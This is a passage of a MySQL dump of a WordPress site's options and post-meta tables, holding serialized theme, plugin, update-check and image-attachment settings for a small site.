menu\";s:8:\"priority\";i:1;}i:1;a:3:{s:2:\"id\";s:13:\"footer-menu-1\";s:5:\"label\";s:21:\"Footer secondary menu\";s:8:\"priority\";i:2;}}}s:9:\"locations\";a:5:{i:0;a:2:{s:2:\"id\";s:11:\"header-menu\";s:5:\"label\";s:19:\"Header primary menu\";}i:1;a:2:{s:2:\"id\";s:13:\"header-menu-1\";s:5:\"label\";s:21:\"Header secondary menu\";}i:2;a:2:{s:2:\"id\";s:12:\"content-menu\";s:5:\"label\";s:12:\"In Page Menu\";}i:3;a:2:{s:2:\"id\";s:11:\"footer-menu\";s:5:\"label\";s:19:\"Footer primary menu\";}i:4;a:2:{s:2:\"id\";s:13:\"footer-menu-1\";s:5:\"label\";s:21:\"Footer secondary menu\";}}s:14:\"locationsToAdd\";a:0:{}s:17:\"locationsToDelete\";a:0:{}}s:12:\"widget_areas\";a:10:{s:20:\"header-widget-area-1\";a:3:{s:4:\"name\";s:20:\"Header widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:6:\"header\";}s:20:\"header-widget-area-2\";a:3:{s:4:\"name\";s:20:\"Header widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:6:\"header\";}s:20:\"header-widget-area-3\";a:3:{s:4:\"name\";s:20:\"Header widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:6:\"header\";}s:21:\"content-widget-area-1\";a:3:{s:4:\"name\";s:21:\"In page widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:7:\"content\";}s:21:\"content-widget-area-2\";a:3:{s:4:\"name\";s:21:\"In page widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:7:\"content\";}s:21:\"content-widget-area-3\";a:3:{s:4:\"name\";s:21:\"In page widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:7:\"content\";}s:20:\"footer-widget-area-1\";a:3:{s:4:\"name\";s:20:\"Footer widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-2\";a:3:{s:4:\"name\";s:20:\"Footer widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-3\";a:3:{s:4:\"name\";s:20:\"Footer widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-4\";a:3:{s:4:\"name\";s:20:\"Footer widget area 4\";s:5:\"index\";i:4;s:4:\"type\";s:6:\"footer\";}}s:6:\"global\";a:11:{s:7:\"content\";a:2:{s:8:\"template\";s:0:\"\";s:10:\"collection\";s:0:\"\";}s:6:\"titles\";a:10:{s:16:\"normalPageFormat\";s:7:\"{TITLE}\";s:17:\"normalResultsPage\";s:27:\"Search results for: {TITLE}\";s:9:\"errorPage\";s:22:\"Sorry! Page Not Found!\";s:10:\"singlePost\";s:7:\"{TITLE}\";s:15:\"categoryArchive\";s:16:\"Posts in {TITLE}\";s:13:\"authorArchive\";s:16:\"Posts in {TITLE}\";s:10:\"tagArchive\";s:16:\"Posts in {TITLE}\";s:11:\"yearArchive\";s:16:\"Posts in {TITLE}\";s:12:\"monthArchive\";s:16:\"Posts in {TITLE}\";s:10:\"dayArchive\";s:16:\"Posts in {TITLE}\";}s:6:\"vSpace\";a:2:{s:5:\"value\";i:20;s:4:\"unit\";s:2:\"px\";}s:6:\"hSpace\";a:2:{s:5:\"value\";i:20;s:4:\"unit\";s:2:\"px\";}s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:90;s:4:\"unit\";s:2:\"px\";}s:10:\"transition\";a:1:{s:8:\"duration\";a:2:{s:5:\"value\";s:3:\"0.5\";s:4:\"unit\";s:1:\"s\";}}s:4:\"blog\";a:2:{s:5:\"style\";a:0:{}s:5:\"props\";a:0:{}}s:5:\"media\";a:2:{s:6:\"mobile\";a:1:{s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:30;s:4:\"unit\";s:2:\"px\";}}s:6:\"tablet\";a:1:{s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:60;s:4:\"unit\";s:2:\"px\";}}}s:13:\"multilanguage\";a:2:{s:5:\"props\";a:2:{s:7:\"enabled\";b:1;s:4:\"type\";s:8:\"dropdown\";}s:5:\"style\";a:4:{s:10:\"background\";a:1:{s:5:\"color\";s:5:\"white\";}s:3:\"top\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:80;}s:6:\"border\";a:2:{s:3:\"top\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}s:6:\"bottom\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}}s:11:\"descendants\";a:1:{s:5:\"flags\";a:1:{s:7:\"padding\";a:4:{s:3:\"top\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:14;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:18;}s:6:\"bottom\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:14;}s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:18;}}}}}}s:9:\"templates\";a:1:{s:4:\"blog\";a:2:{s:5:\"style\";a:1:{s:11:\"descendants\";a:2:{s:7:\"section\";a:1:{s:7:\"padding\";a:2:{s:3:\"top\";a:1:{s:5:\"value\";s:2:\"90\";}s:6:\"bottom\";a:1:{s:5:\"value\";s:2:\"90\";}}}s:13:\"sidebar-right\";a:3:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:5:\"value\";i:25;s:4:\"unit\";s:1:\"%\";}}s:8:\"maxWidth\";a:2:{s:5:\"value\";i:25;s:4:\"unit\";s:1:\"%\";}s:5:\"media\";a:2:{s:6:\"mobile\";a:2:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:5:\"value\";s:3:\"100\";s:4:\"unit\";s:1:\"%\";}}s:8:\"maxWidth\";a:2:{s:5:\"value\";s:3:\"100\";s:4:\"unit\";s:1:\"%\";}}s:6:\"tablet\";a:2:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:4:\"unit\";s:1:\"%\";s:5:\"value\";s:5:\"33.33\";}}s:8:\"maxWidth\";a:2:{s:4:\"unit\";s:1:\"%\";s:5:\"value\";s:5:\"33.33\";}}}}}}s:5:\"props\";a:1:{s:11:\"descendants\";a:2:{s:3:\"row\";a:2:{s:6:\"layout\";a:2:{s:13:\"horizontalGap\";i:2;s:11:\"verticalGap\";i:2;}s:14:\"layout-classes\";a:3:{s:5:\"unset\";b:1;s:11:\"outer_class\";a:1:{i:0;s:16:\"gutters-row-lg-2\";}s:11:\"inner_class\";a:1:{i:0;s:16:\"gutters-col-lg-2\";}}}s:7:\"section\";a:1:{s:8:\"sidebars\";a:1:{s:5:\"right\";b:1;}}}}}}s:16:\"visible_partials\";a:0:{}}s:8:\"imported\";a:10:{s:18:\"theme_default_data\";b:1;s:17:\"header/front_page\";b:1;s:11:\"header/post\";b:1;s:11:\"footer/post\";b:1;s:9:\"main/post\";b:1;s:12:\"main/archive\";b:1;s:8:\"main/404\";b:1;s:11:\"main/search\";b:1;s:12:\"sidebar/post\";b:1;s:15:\"sidebar/product\";b:1;}}','yes'),(362,'_transient_colibriwp_used_svg_icons','a:2:{s:17:\"font-awesome/bars\";s:439:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"/></svg>\";s:31:\"icons8-line-awesome/arrow-right\";s:238:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"arrow-right\" viewBox=\"0 0 512 545.5\"><path d=\"M299.5 140.5l136 136 11 11.5-11 11.5-136 136-23-23L385 304H64v-32h321L276.5 163.5z\"/></svg>\";}','yes'),(365,'nav_menu_options','a:1:{s:8:\"auto_add\";a:1:{i:0;i:5;}}','yes'),(368,'site_logo','7','yes'),(474,'forminator_free_install_date','1644949888','no'),(475,'wpmudev_recommended_plugins_registered','a:2:{s:25:\"forminator/forminator.php\";a:1:{s:13:\"registered_at\";i:1644949888;}s:23:\"wp-smushit/wp-smush.php\";a:1:{s:13:\"registered_at\";i:1647548043;}}','no'),(476,'forminator_version','1.26.0','yes'),(477,'widget_forminator_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(479,'forminator_appearance_presets','a:1:{s:7:\"default\";s:14:\"Default Preset\";}','yes'),(482,'forminator_posts_map','a:0:{}','yes'),(513,'wp_calendar_block_has_published_posts','','yes'),(554,'tax_staff_member_cat_children','a:0:{}','yes'),(830,'staff-member-group_children','a:0:{}','yes'),(844,'wpm_6310_version_info','3.9','yes'),(845,'wpm_6310_default_category_update','100','no'),(991,'ime_options','a:7:{s:7:\"enabled\";b:1;s:4:\"mode\";s:3:\"php\";s:8:\"cli_path\";s:44:\"/home/websites/gsudice.dataconn.net/wp-admin\";s:12:\"handle_sizes\";a:6:{s:9:\"thumbnail\";s:4:\"size\";s:6:\"medium\";s:7:\"quality\";s:12:\"medium_large\";s:7:\"quality\";s:5:\"large\";s:4:\"size\";s:9:\"1536x1536\";s:4:\"size\";s:9:\"2048x2048\";s:4:\"size\";}s:7:\"quality\";a:2:{s:7:\"quality\";i:-1;s:4:\"size\";i:70;}s:9:\"interlace\";b:0;s:7:\"version\";i:1;}','no'),(1147,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:13:\"dice@pobox.pw\";s:7:\"version\";s:5:\"6.3.1\";s:9:\"timestamp\";i:1695808177;}','no'),(1476,'WPLANG','','yes'),(1477,'new_admin_email','dice@pobox.pw','yes'),(1508,'forminator_days_rating_later_dismiss','1','yes'),(7382,'forminator_version_upgraded','1','yes'),(7405,'wp-smush-settings','a:23:{s:4:\"auto\";b:1;s:5:\"lossy\";b:0;s:10:\"strip_exif\";b:1;s:6:\"resize\";b:0;s:9:\"detection\";b:0;s:8:\"original\";b:0;s:6:\"backup\";b:0;s:8:\"no_scale\";b:0;s:10:\"png_to_jpg\";b:0;s:7:\"nextgen\";b:0;s:2:\"s3\";b:0;s:9:\"gutenberg\";b:0;s:10:\"js_builder\";b:0;s:3:\"cdn\";b:0;s:11:\"auto_resize\";b:0;s:4:\"webp\";b:1;s:5:\"usage\";b:0;s:17:\"accessible_colors\";b:0;s:9:\"keep_data\";b:1;s:9:\"lazy_load\";b:0;s:17:\"background_images\";b:1;s:16:\"rest_api_support\";b:0;s:8:\"webp_mod\";b:0;}','yes'),(7406,'wp-smush-install-type','existing','no'),(7407,'wp-smush-version','3.9.5','no'),(7410,'wdev-frash','a:3:{s:7:\"plugins\";a:1:{s:23:\"wp-smushit/wp-smush.php\";i:1647548043;}s:5:\"queue\";a:1:{s:32:\"fc50097023d0d34c5a66f6cddcf77694\";a:3:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:4:\"rate\";s:7:\"show_at\";i:1648152843;}}s:4:\"done\";a:1:{i:0;a:6:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:5:\"email\";s:7:\"show_at\";i:1647548043;s:5:\"state\";s:6:\"ignore\";s:4:\"hash\";s:32:\"fc50097023d0d34c5a66f6cddcf77694\";s:10:\"handled_at\";i:1647548136;}}}','no'),(7616,'cp_dismissed_notifications','a:3:{i:0;s:49:\"extendthemes_remote_notification_colibri-wp_17113\";i:1;s:49:\"extendthemes_remote_notification_colibri-wp_19773\";i:2;s:49:\"extendthemes_remote_notification_colibri-wp_28810\";}','yes'),(9202,'category_children','a:0:{}','yes'),(76535,'user_count','1','no'),(76536,'db_upgraded','','yes'),(222859,'wpmudev_notices','a:3:{s:7:\"plugins\";a:1:{s:10:\"forminator\";i:1666629100;}s:5:\"queue\";a:1:{s:10:\"forminator\";a:3:{s:5:\"email\";i:1666629100;s:4:\"rate\";i:1667233900;s:8:\"giveaway\";i:1666801900;}}s:4:\"done\";a:0:{}}','no'),(259540,'using_application_passwords','1','no'),(261991,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:6:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.7.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.7.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.7.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.7.1\";s:7:\"version\";s:5:\"6.7.1\";s:11:\"php_version\";s:6:\"7.2.24\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:51:\"https://downloads.w.org/release/wordpress-6.7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:51:\"https://downloads.w.org/release/wordpress-6.7.1.zip\";s:10:\"no_content\";s:62:\"https://downloads.w.org/release/wordpress-6.7.1-no-content.zip\";s:11:\"new_bundled\";s:63:\"https://downloads.w.org/release/wordpress-6.7.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.7.1\";s:7:\"version\";s:5:\"6.7.1\";s:11:\"php_version\";s:6:\"7.2.24\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:51:\"https://downloads.w.org/release/wordpress-6.6.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:51:\"https://downloads.w.org/release/wordpress-6.6.2.zip\";s:10:\"no_content\";s:62:\"https://downloads.w.org/release/wordpress-6.6.2-no-content.zip\";s:11:\"new_bundled\";s:63:\"https://downloads.w.org/release/wordpress-6.6.2-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.6.2\";s:7:\"version\";s:5:\"6.6.2\";s:11:\"php_version\";s:6:\"7.2.24\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:51:\"https://downloads.w.org/release/wordpress-6.5.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:51:\"https://downloads.w.org/release/wordpress-6.5.5.zip\";s:10:\"no_content\";s:62:\"https://downloads.w.org/release/wordpress-6.5.5-no-content.zip\";s:11:\"new_bundled\";s:63:\"https://downloads.w.org/release/wordpress-6.5.5-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.5.5\";s:7:\"version\";s:5:\"6.5.5\";s:11:\"php_version\";s:5:\"7.0.0\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:4;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:51:\"https://downloads.w.org/release/wordpress-6.4.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:51:\"https://downloads.w.org/release/wordpress-6.4.5.zip\";s:10:\"no_content\";s:62:\"https://downloads.w.org/release/wordpress-6.4.5-no-content.zip\";s:11:\"new_bundled\";s:63:\"https://downloads.w.org/release/wordpress-6.4.5-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.4.5\";s:7:\"version\";s:5:\"6.4.5\";s:11:\"php_version\";s:5:\"7.0.0\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:5;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:51:\"https://downloads.w.org/release/wordpress-6.3.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:51:\"https://downloads.w.org/release/wordpress-6.3.5.zip\";s:10:\"no_content\";s:62:\"https://downloads.w.org/release/wordpress-6.3.5-no-content.zip\";s:11:\"new_bundled\";s:63:\"https://downloads.w.org/release/wordpress-6.3.5-new-bundled.zip\";s:7:\"partial\";s:61:\"https://downloads.w.org/release/wordpress-6.3.5-partial-1.zip\";s:8:\"rollback\";s:62:\"https://downloads.w.org/release/wordpress-6.3.5-rollback-1.zip\";}s:7:\"current\";s:5:\"6.3.5\";s:7:\"version\";s:5:\"6.3.5\";s:11:\"php_version\";s:5:\"7.0.0\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:5:\"6.3.1\";s:9:\"new_files\";s:0:\"\";}}s:12:\"last_checked\";i:1732921209;s:15:\"version_checked\";s:5:\"6.3.1\";s:12:\"translations\";a:0:{}}','no'),(262063,'can_compress_scripts','1','yes'),(262261,'forminator_default_report_entry','1','yes'),(262398,'ccj__activation_time','1696013150','yes'),(262399,'ccj__version','3.44','yes'),(262401,'custom-css-js-tree','a:1:{s:25:\"frontend-html-footer-both\";a:4:{i:0;s:9:\"1834.html\";i:1;s:9:\"1832.html\";i:2;s:9:\"1594.html\";i:3;s:9:\"1593.html\";}}','yes'),(311671,'_transient_colibri_page_builder_cache','a:2:{i:0;b:0;s:4:\"logo\";a:1:{s:14:\"logo-alt-image\";a:1:{s:32:\"4fb361f3001cf4024a2f3ece20951cbf\";i:7;}}}','yes'),(312669,'_site_transient_timeout_php_check_6db38e822b455ffc41aae2038562713f','1733337286','no'),(312670,'_site_transient_php_check_6db38e822b455ffc41aae2038562713f','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"7.2.24\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(312769,'_site_transient_timeout_theme_roots','1732923009','no'),(312770,'_site_transient_theme_roots','a:3:{s:10:\"colibri-wp\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','no'),(312771,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1732921210;s:7:\"checked\";a:3:{s:10:\"colibri-wp\";s:6:\"1.0.93\";s:17:\"twentytwentythree\";s:3:\"1.2\";s:15:\"twentytwentytwo\";s:3:\"1.4\";}s:8:\"response\";a:3:{s:10:\"colibri-wp\";a:6:{s:5:\"theme\";s:10:\"colibri-wp\";s:11:\"new_version\";s:7:\"1.0.137\";s:3:\"url\";s:40:\"https://wordpress.org/themes/colibri-wp/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/colibri-wp.1.0.137.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.6.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.9\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.9.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:0:{}s:12:\"translations\";a:0:{}}','no'),(312772,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1732921210;s:8:\"response\";a:3:{s:45:\"colibri-page-builder/colibri-page-builder.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:34:\"w.org/plugins/colibri-page-builder\";s:4:\"slug\";s:20:\"colibri-page-builder\";s:6:\"plugin\";s:45:\"colibri-page-builder/colibri-page-builder.php\";s:11:\"new_version\";s:7:\"1.0.315\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/colibri-page-builder/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/colibri-page-builder.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/colibri-page-builder/assets/icon-256x256.gif?rev=2748397\";s:2:\"1x\";s:73:\"https://ps.w.org/colibri-page-builder/assets/icon-128x128.gif?rev=2748397\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:75:\"https://ps.w.org/colibri-page-builder/assets/banner-772x250.jpg?rev=2748397\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"6.7.1\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:31:\"custom-css-js/custom-css-js.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:27:\"w.org/plugins/custom-css-js\";s:4:\"slug\";s:13:\"custom-css-js\";s:6:\"plugin\";s:31:\"custom-css-js/custom-css-js.php\";s:11:\"new_version\";s:4:\"3.49\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/custom-css-js/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/custom-css-js.3.49.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/custom-css-js/assets/icon-128x128.png?rev=1303730\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/custom-css-js/assets/banner-1544x500.png?rev=1770945\";s:2:\"1x\";s:68:\"https://ps.w.org/custom-css-js/assets/banner-772x250.png?rev=1303730\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.0.1\";s:6:\"tested\";s:5:\"6.7.1\";s:12:\"requires_php\";s:5:\"5.2.4\";s:16:\"requires_plugins\";a:0:{}}s:31:\"team-showcase-supreme/index.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:35:\"w.org/plugins/team-showcase-supreme\";s:4:\"slug\";s:21:\"team-showcase-supreme\";s:6:\"plugin\";s:31:\"team-showcase-supreme/index.php\";s:11:\"new_version\";s:3:\"7.3\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/team-showcase-supreme/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/team-showcase-supreme.7.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/team-showcase-supreme/assets/icon-256x256.png?rev=2597164\";s:2:\"1x\";s:74:\"https://ps.w.org/team-showcase-supreme/assets/icon-256x256.png?rev=2597164\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:76:\"https://ps.w.org/team-showcase-supreme/assets/banner-772x250.png?rev=2597173\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:6:\"4.6.14\";s:6:\"tested\";s:5:\"6.7.1\";s:12:\"requires_php\";s:3:\"5.6\";s:16:\"requires_plugins\";a:0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:1:{s:25:\"forminator/forminator.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/forminator\";s:4:\"slug\";s:10:\"forminator\";s:6:\"plugin\";s:25:\"forminator/forminator.php\";s:11:\"new_version\";s:6:\"1.37.1\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/forminator/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/forminator.1.37.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/forminator/assets/icon-256x256.png?rev=2746202\";s:2:\"1x\";s:63:\"https://ps.w.org/forminator/assets/icon-128x128.png?rev=2746202\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/forminator/assets/banner-1544x500.png?rev=2626060\";s:2:\"1x\";s:65:\"https://ps.w.org/forminator/assets/banner-772x250.png?rev=2626060\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.4\";s:6:\"tested\";s:5:\"6.7.1\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}}s:7:\"checked\";a:4:{s:45:\"colibri-page-builder/colibri-page-builder.php\";s:7:\"1.0.236\";s:25:\"forminator/forminator.php\";s:6:\"1.26.0\";s:31:\"custom-css-js/custom-css-js.php\";s:4:\"3.44\";s:31:\"team-showcase-supreme/index.php\";s:3:\"5.1\";}}','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_postmeta`
--
DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `post_id` (`post_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=2676 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_postmeta`
--
LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (2,3,'_wp_page_template','default'),(5,7,'_wp_attached_file','2022/02/DICE-log-6-sides-Largbox_text-e1644937921882.png'),(6,7,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:94;s:4:\"file\";s:56:\"2022/02/DICE-log-6-sides-Largbox_text-e1644937921882.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"DICE-log-6-sides-Largbox_text-300x282.png\";s:5:\"width\";i:300;s:6:\"height\";i:282;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"DICE-log-6-sides-Largbox_text-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"DICE-log-6-sides-Largbox_text-768x723.png\";s:5:\"width\";i:768;s:6:\"height\";i:723;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7,8,'origin','theme'),(8,9,'origin','theme'),(9,7,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:880;s:6:\"height\";i:828;s:4:\"file\";s:33:\"DICE-log-6-sides-Largbox_text.png\";}s:18:\"full-1644937905480\";a:3:{s:5:\"width\";i:500;s:6:\"height\";i:470;s:4:\"file\";s:48:\"DICE-log-6-sides-Largbox_text-e1644937900408.png\";}s:18:\"full-1644937910612\";a:3:{s:5:\"width\";i:300;s:6:\"height\";i:282;s:4:\"file\";s:48:\"DICE-log-6-sides-Largbox_text-e1644937905480.png\";}s:18:\"full-1644937921882\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:188;s:4:\"file\";s:48:\"DICE-log-6-sides-Largbox_text-e164493